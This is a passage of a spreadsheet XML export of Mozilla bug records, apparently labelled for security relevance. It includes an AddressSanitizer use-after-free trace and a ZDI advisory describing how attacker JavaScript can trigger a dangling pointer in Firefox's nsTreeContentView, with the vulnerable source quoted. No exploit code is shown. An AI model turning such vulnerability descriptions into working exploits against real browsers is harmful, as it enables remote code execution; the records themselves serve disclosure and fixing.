    #46 0x7fb2fe273858 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #47 0x7fb2fe273858 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #48 0x7fb2fe273858 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #49 0x7fb305cbdae3 in XRE_InitChildProcess /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:701:7
    #50 0x4dfb2b in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:197:19
    #51 0x4dfb2b in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:392
    #52 0x7fb31896c82f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #53 0x41ba08 in _start (/home/nils/MonkeyFarm/firefox/firefox+0x41ba08)
0x60e0000855a8 is located 40 bytes inside of 160-byte region [0x60e000085580,0x60e000085620)
freed by thread T0 (Web Content) here:
    #0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fb3024bde89 in operator delete /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:218:12
    #2 0x7fb3024bde89 in FreeData /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:1226
    #3 0x7fb3024bde89 in mozilla::dom::HTMLInputElement::HandleTypeChange(unsigned char) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:5099
    #4 0x7fb3024e7e2f in mozilla::dom::HTMLInputElement::ParseAttribute(int, nsIAtom*, nsAString_internal const&amp;, nsAttrValue&amp;) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:5683:9
    #5 0x7fb30005430f in mozilla::dom::Element::SetAttr(int, nsIAtom*, nsIAtom*, nsAString_internal const&amp;, bool) /home/worker/workspace/build/src/dom/base/Element.cpp:2379:8
    #6 0x7fb302627233 in nsGenericHTMLElement::SetAttr(int, nsIAtom*, nsIAtom*, nsAString_internal const&amp;, bool) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:831:17
    #7 0x7fb301bed612 in SetAttr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:487:12
    #8 0x7fb301bed612 in SetAttr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:1115
    #9 0x7fb301bed612 in SetHTMLAttr /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.h:961
    #10 0x7fb301bed612 in SetType /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/HTMLInputElement.h:654
    #11 0x7fb301bed612 in mozilla::dom::HTMLInputElementBinding::set_type(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLInputElement*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLInputElementBinding.cpp:2126
    #12 0x7fb301e5d603 in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2825:8
    #13 0x7fb3081a456c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #14 0x7fb3081a456c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #15 0x7fb3081a6888 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #16 0x7fb3081a6888 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:649
    #17 0x7fb30820f6ee in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2419:10
    #18 0x7fb30820f6ee in js::NativeSetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::QualifiedBool, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2454
    #19 0x7fb30817d574 in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1550:12
    #20 0x7fb30817d574 in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:258
    #21 0x7fb30817d574 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2715
    #22 0x7fb308169a33 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #23 0x7fb3081a4d84 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
    #24 0x7fb3081a57f2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #25 0x7fb307c75c0d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2827:12
    #26 0x7fb301892e4c in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #27 0x7fb302275b72 in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:64:12
    #28 0x7fb302275b72 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1129
    #29 0x7fb30227717f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
    #30 0x7fb3022617b6 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #31 0x7fb302265883 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #32 0x7fb302267b5d in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:777:12
    #33 0x7fb300352cd1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1309:5
    #34 0x7fb302200f76 in mozilla::AsyncEventDispatcher::Run() /home/worker/workspace/build/src/dom/events/AsyncEventDispatcher.cpp:54:3
    #35 0x7fb2ffe769d1 in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5194:5
    #36 0x7fb303df01e2 in applyImpl&lt;mozilla::HTMLEditRules, void (mozilla::HTMLEditRules::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
    #37 0x7fb303df01e2 in apply&lt;mozilla::HTMLEditRules, void (mozilla::HTMLEditRules::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
    #38 0x7fb303df01e2 in mozilla::detail::RunnableMethodImpl&lt;void (mozilla::HTMLEditRules::*)(), true, false&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
    #39 0x7fb2ffe769d1 in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5194:5
    #40 0x7fb302684bcc in ~nsAutoScriptBlocker /home/worker/workspace/build/src/obj-firefox/dist/include/nsContentUtils.h:2853:5
    #41 0x7fb302684bcc in nsTextEditorState::SetValue(nsAString_internal const&amp;, unsigned int) /home/worker/workspace/build/src/dom/html/nsTextEditorState.cpp:2176
    #42 0x7fb3024b794a in mozilla::dom::HTMLInputElement::SetValueInternal(nsAString_internal const&amp;, unsigned int) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:3267:14
    #43 0x7fb3024c5851 in mozilla::dom::HTMLInputElement::SetValue(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:1994:9
    #44 0x7fb301bee5a7 in mozilla::dom::HTMLInputElementBinding::set_value(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLInputElement*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLInputElementBinding.cpp:2258:3
previously allocated by thread T0 (Web Content) here:
    #0 0x4b247b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0d6d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fb3024b3fbf in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7fb3024b3fbf in mozilla::dom::HTMLInputElement::HTMLInputElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;, mozilla::dom::FromParser, mozilla::dom::HTMLInputElement::FromClone) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:1193
    #4 0x7fb3024a4d5c in NS_NewHTMLInputElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:129:1
    #5 0x7fb30264097b in CreateHTMLElement /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:289:41
    #6 0x7fb30264097b in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsAString_internal const*) /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:270
    #7 0x7fb30039c564 in NS_NewElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsAString_internal const*) /home/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:177:12
    #8 0x7fb30028026f in nsDocument::CreateElem(nsAString_internal const&amp;, nsIAtom*, int, nsAString_internal const*) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8143:17
    #9 0x7fb3002628c1 in nsDocument::CreateElement(nsAString_internal const&amp;, mozilla::dom::ElementCreationOptionsOrString const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5409:26
    #10 0x7fb3018bb4e7 in mozilla::dom::DocumentBinding::createElement(JSContext*, JS::Handle&lt;JSObject*&gt;, nsIDocument*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1010:53
    #11 0x7fb301e5de10 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2857:13
    #12 0x7fb3081a456c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #13 0x7fb3081a456c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #14 0x7fb308184875 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:509:12
    #15 0x7fb308184875 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #16 0x7fb308169a33 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #17 0x7fb3081a4d84 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
    #18 0x7fb3081a57f2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #19 0x7fb307c75c0d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2827:12
    #20 0x7fb30188f93f in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #21 0x7fb3022a9981 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #22 0x7fb3022a9981 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #23 0x7fb302275bbd in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
    #24 0x7fb30227717f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
    #25 0x7fb3022617b6 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #26 0x7fb302265883 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #27 0x7fb304427e55 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1001:7
    #28 0x7fb3051aa82e in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7554:5
    #29 0x7fb3051a66a4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7358:7
    #30 0x7fb3051adbcf in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7255:13
    #31 0x7fb2ff2d3f40 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #32 0x7fb2ff2d2f08 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #33 0x7fb2ff2cfcbc in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #34 0x7fb2ff2d1d94 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:750:45 in operator bool
Shadow bytes around the buggy address:
  0x0c1c80008a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c80008a70: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1c80008a80: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c1c80008a90: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c80008aa0: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
=&gt;0x0c1c80008ab0: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c1c80008ac0: fd fd fd fd fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c1c80008ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c1c80008ae0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1c80008af0: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c1c80008b00: fa fa fa fa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8411==ABORTING</t>
        </is>
      </c>
      <c r="X5402" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5403">
      <c r="A5403" t="n">
        <v>576070</v>
      </c>
      <c r="B5403" t="inlineStr">
        <is>
          <t>2010-06-30 13:13:55 -0700</t>
        </is>
      </c>
      <c r="C5403" t="inlineStr">
        <is>
          <t>nsTreeContentView Dangling Pointer Remote Code Execution Vulnerability (ZDI-CAN-804)</t>
        </is>
      </c>
      <c r="D5403" t="inlineStr">
        <is>
          <t>2010-09-27 18:31:18 -0700</t>
        </is>
      </c>
      <c r="E5403" t="n">
        <v>1</v>
      </c>
      <c r="F5403" t="n">
        <v>1</v>
      </c>
      <c r="G5403" t="n">
        <v>3</v>
      </c>
      <c r="H5403" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5403" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5403" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K5403" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5403" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5403" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5403" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5403" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5403" t="inlineStr">
        <is>
          <t>[sg:critical][critsmash:investigating] [qa-examined-191]</t>
        </is>
      </c>
      <c r="Q5403" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5403" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5403" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5403" t="n">
        <v>1</v>
      </c>
      <c r="U5403" t="n">
        <v>0</v>
      </c>
      <c r="V5403" t="n">
        <v>16</v>
      </c>
      <c r="W5403" t="inlineStr">
        <is>
          <t>Created attachment 455232
PoC
ZDI-CAN-804: Mozilla Firefox nsTreeContentView Dangling Pointer Remote Code Execution Vulnerability
-- CVSS ----------------------------------------------------------------
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)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implementation of a particular
element within the XUL namespace. Due to a method for the element having
the side effect of executing javascript, an attacker can provide their
own javascript code which can be used to remove an object out from
underneath the element's child hierarchy. This can force the application
to make an invalid reference when traversing it's internal objects, thus
using an illegitimate pointer. This can be leveraged by an attacker to
execute arbitrary code under the context of the application.
Version(s)  tested: 
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3)
Gecko/20100401 Firefox/3.6.3
One of the arguments to nsTreeContentView::GetCell is an nsITreeColumn
interface. This gives the function the side effect of being able to
execute a method of this object that is provided by the site. In this
code, the first point of the variable that can be controlled is located
within ChildIterator::Init.
layout/xul/base/src/tree/src/nsTreeContentView.cpp:1531
nsIContent*
nsTreeContentView::GetCell(nsIContent* aContainer, nsITreeColumn* aCol)
{
  nsCOMPtr&lt;nsIAtom&gt; colAtom;
  PRInt32 colIndex;
  aCol-&gt;GetAtom(getter_AddRefs(colAtom));
  aCol-&gt;GetIndex(&amp;colIndex);    // XXX
  // Traverse through cells, try to find the cell by "ref" attribute or
by cell
  // index in a row. "ref" attribute has higher priority.
  nsIContent* result = nsnull;
  PRInt32 j = 0;
  ChildIterator iter, last;
  for (ChildIterator::Init(aContainer, &amp;iter, &amp;last); iter != last;
++iter) {
    nsIContent* cell = *iter;
    if (cell-&gt;Tag() == nsGkAtoms::treecell) {
      if (colAtom &amp;&amp; cell-&gt;AttrValueIs(kNameSpaceID_None,
nsGkAtoms::ref,
                                       colAtom, eCaseMatters)) {
        result = cell;
        break;
      }
      else if (j == colIndex) {
        result = cell;
      }
      j++;
    }
  }
  return result;
}
An example of a method that can be used to exploit the side effect in
the previously function can be located within ::GetCellValue. If an
attacker destroys the row when GetCell is called, then
ChildIterator::Init will access it as the unsafe type.
layout/xul/base/src/tree/src/nsTreeContentView.cpp:471
NS_IMETHODIMP
nsTreeContentView::GetCellValue(PRInt32 aRow, nsITreeColumn* aCol,
nsAString&amp; _retval)
{
  _retval.Truncate();
  NS_ENSURE_ARG_POINTER(aCol);
  NS_PRECONDITION(aRow &gt;= 0 &amp;&amp; aRow &lt; PRInt32(mRows.Length()), "bad
row");
  if (aRow &lt; 0 || aRow &gt;= PRInt32(mRows.Length()))
    return NS_ERROR_INVALID_ARG;   
  Row* row = mRows[aRow];
  nsIContent* realRow =
    nsTreeUtils::GetImmediateChild(row-&gt;mContent, nsGkAtoms::treerow);
  if (realRow) {
    nsIContent* cell = GetCell(realRow, aCol);  // XXX
    if (cell)
      cell-&gt;GetAttr(kNameSpaceID_None, nsGkAtoms::value, _retval);
  }
  return NS_OK;
}
At this point, aContent has been destroyed.
layout/base/nsChildIterator.cpp:48
nsresult
ChildIterator::Init(nsIContent*    aContent,
                    ChildIterator* aFirst,
                    ChildIterator* aLast)
{
  // Initialize out parameters to be equal, in case of failure.
  aFirst-&gt;mContent = aLast-&gt;mContent = nsnull;
  aFirst-&gt;mIndex   = aLast-&gt;mIndex   = 0;
  NS_PRECONDITION(aContent != nsnull, "no content");
  if (! aContent)
    return NS_ERROR_NULL_POINTER;
  nsIDocument* doc = aContent-&gt;GetOwnerDoc();
  ...
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X5403" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5404">
      <c r="A5404" t="n">
        <v>928195</v>
      </c>
      <c r="B5404" t="inlineStr">
        <is>
          <t>2013-10-17 17:54:50 -0700</t>
        </is>
      </c>
      <c r="C5404" t="inlineStr">
        <is>
          <t>Clobber needed after landing WebIDL changes in bug 902003</t>
        </is>
      </c>
      <c r="D5404" t="inlineStr">
        <is>
          <t>2018-03-02 12:12:20 -0800</t>
        </is>
      </c>
      <c r="E5404" t="n">
        <v>1</v>
      </c>
      <c r="F5404" t="n">
        <v>1</v>
      </c>
      <c r="G5404" t="n">
        <v>7</v>
      </c>
      <c r="H5404" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5404" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J5404" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5404" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5404" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5404" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5404" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5404" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5404" t="inlineStr">
        <is>
          <t>[capacity]</t>
        </is>
      </c>
      <c r="Q5404" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5404" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5404" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T5404" t="n">
        <v>1</v>
      </c>
      <c r="U5404" t="n">
        <v>0</v>
      </c>
      <c r="V5404" t="n">
        <v>143</v>
      </c>
      <c r="W5404" t="inlineStr">
        <is>
          <t>See https://tbpl.mozilla.org/php/getParsedLog.php?id=29282321&amp;tree=Mozilla-Inbound
from checkin https://tbpl.mozilla.org/?tree=Mozilla-Inbound&amp;rev=2a6d4fa91d5b
Those methods were added to dom/webidl/PeerConnectionObserver.webidl and should have been available to all platforms.</t>
        </is>
      </c>
      <c r="X5404" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5405">
      <c r="A5405" t="n">
        <v>390983</v>
      </c>
      <c r="B5405" t="inlineStr">
        <is>
          <t>2007-08-05 00:01:41 -0700</t>
        </is>
      </c>
      <c r="C5405" t="inlineStr">
        <is>
          <t>addMicrosummaryGenerator sidebar method can install from file URIs in content</t>
        </is>
      </c>
      <c r="D5405" t="inlineStr">
        <is>
          <t>2016-02-12 06:59:33 -0800</t>
        </is>
      </c>
      <c r="E5405" t="n">
        <v>1</v>
      </c>
      <c r="F5405" t="n">
        <v>1</v>
      </c>
      <c r="G5405" t="n">
        <v>6</v>
      </c>
      <c r="H5405" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5405" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J5405" t="inlineStr">
        <is>
          <t>Microsummaries</t>
        </is>
      </c>
      <c r="K5405" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L5405" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5405" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5405" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5405" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5405" t="inlineStr">
        <is>
          <t>[sg:low], [need testcase]</t>
        </is>
      </c>
      <c r="Q5405" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5405" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S5405" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5405" t="n">
        <v>1</v>
      </c>
      <c r="U5405" t="n">
        <v>0</v>
      </c>
      <c r="V5405" t="n">
        <v>10</v>
      </c>
      <c r="W5405" t="inlineStr">
        <is>
          <t>Created attachment 275304
1.8 patch
From what I can tell, this only opens up another way to get at bug 267645 (making the XHR throw an OOM from loading large files), which can be done through easier paths than this. Filing in sg just because it's late and I may have missed something other than that - if not we should at least close this up to maintain consistency with content policies/other sidebar methods.
I'll fix this on trunk as part of bug 370242.</t>
        </is>
      </c>
      <c r="X5405" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5406">
      <c r="A5406" t="n">
        <v>864878</v>
      </c>
      <c r="B5406" t="inlineStr">
        <is>
          <t>2013-04-23 10:46:15 -0700</t>
        </is>
      </c>
      <c r="C5406" t="inlineStr">
        <is>
          <t>Incorrect amount is billed to mobile bill in Spain - tax is being double billed to user.</t>
        </is>
      </c>
      <c r="D5406" t="inlineStr">
        <is>
          <t>2013-05-03 13:23:38 -0700</t>
        </is>
      </c>
      <c r="E5406" t="n">
        <v>1</v>
      </c>
      <c r="F5406" t="n">
        <v>1</v>
      </c>
      <c r="G5406" t="n">
        <v>6</v>
      </c>
      <c r="H5406" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5406" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J5406" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K5406" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L5406" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5406" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5406" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5406" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5406" t="inlineStr"/>
      <c r="Q5406" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5406" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5406" t="inlineStr">
        <is>
          <t>2013-05-02</t>
        </is>
      </c>
      <c r="T5406" t="n">
        <v>1</v>
      </c>
      <c r="U5406" t="n">
        <v>0</v>
      </c>
      <c r="V5406" t="n">
        <v>9</v>
      </c>
